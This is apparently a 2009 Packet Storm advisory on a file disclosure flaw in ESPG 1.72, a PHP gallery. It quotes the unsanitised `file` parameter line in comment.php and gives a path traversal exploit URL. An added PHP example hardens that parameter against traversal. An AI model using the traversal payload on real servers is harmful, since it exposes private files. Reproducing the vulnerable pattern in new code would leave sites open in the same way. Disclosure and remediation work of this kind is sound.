ESPG 1.72 File Disclosure

2009-01-21T00:00:00
ID PACKETSTORM:74126
Type packetstorm
Reporter bd0rk
Modified 2009-01-21T00:00:00

Description

                                        
.::ESPG 1.72 File Disclosure Vulnerability::.  
  
  
  
=> Scriptname: ESPG (Enhanced Simple PHP Gallery) 1.72  
  
=> Vendor: http://quirm.net  
  
=> Download: http://quirm.net/download/21/  
  
=> Bugfounder: bd0rk  
  
=> Contact: bd0rk[at]hackermail.com  
  
=> Greetings: str0ke, TheJT, Maria, Alucard, x0r_32  
  
=> Vulnerable Code in comment.php line 3  
  
-------------------------  
  
$fileid = $_GET['file'];  
  
-------------------------  
  
  
  
[+]Sploit: http://[t4rg3t]/gallery/comment.php?file=../../TARGETFILE.php  
  
  
###The 20-year-old German hacker bd0rk###  
  
  
=> 'GAINST WAR IN ISRAEL AND GAZA!!! <=  
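
A hardened form of the `file` parameter handling quoted above from comment.php, as an added example that is not ESPG's code or the reporter's. It assumes `$fileid` is used to read a file under the gallery directory; `GALLERY_ROOT`, `resolve_gallery_file()` and the image-extension allow-list are hypothetical.

```php
<?php
// Added example, not ESPG's own code. GALLERY_ROOT, resolve_gallery_file()
// and the extension allow-list are assumptions; adjust to the real layout.
const GALLERY_ROOT = __DIR__ . '/gallery';

/**
 * Map the user-supplied `file` parameter to a real path inside GALLERY_ROOT.
 * Returns null when the value cannot be proven to stay inside that directory.
 */
function resolve_gallery_file($param): ?string
{
    // Reject arrays (?file[]=x) and empty values outright.
    if (!is_string($param) || $param === '') {
        return null;
    }
    // NUL bytes and backslashes have no place in a gallery-relative path.
    if (strpbrk($param, "\0\\") !== false) {
        return null;
    }
    // Allow-list the extension so scripts and config files are never served.
    $ext = strtolower(pathinfo($param, PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true)) {
        return null;
    }
    $root = realpath(GALLERY_ROOT);
    if ($root === false) {
        return null;
    }
    // realpath() collapses "../" sequences and symlinks before the check.
    $path = realpath($root . DIRECTORY_SEPARATOR . $param);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // Containment check: the resolved path must begin with "<root>/".
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Replaces the line from the advisory: $fileid = $_GET['file'];
$fileid = resolve_gallery_file($_GET['file'] ?? null);
if ($fileid === null) {
    http_response_code(400);
    exit('Invalid file parameter');
}
```

The containment check runs on the resolved path, so a value such as `../../TARGETFILE.php` is rejected both by the extension allow-list and by falling outside the gallery root.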
  
  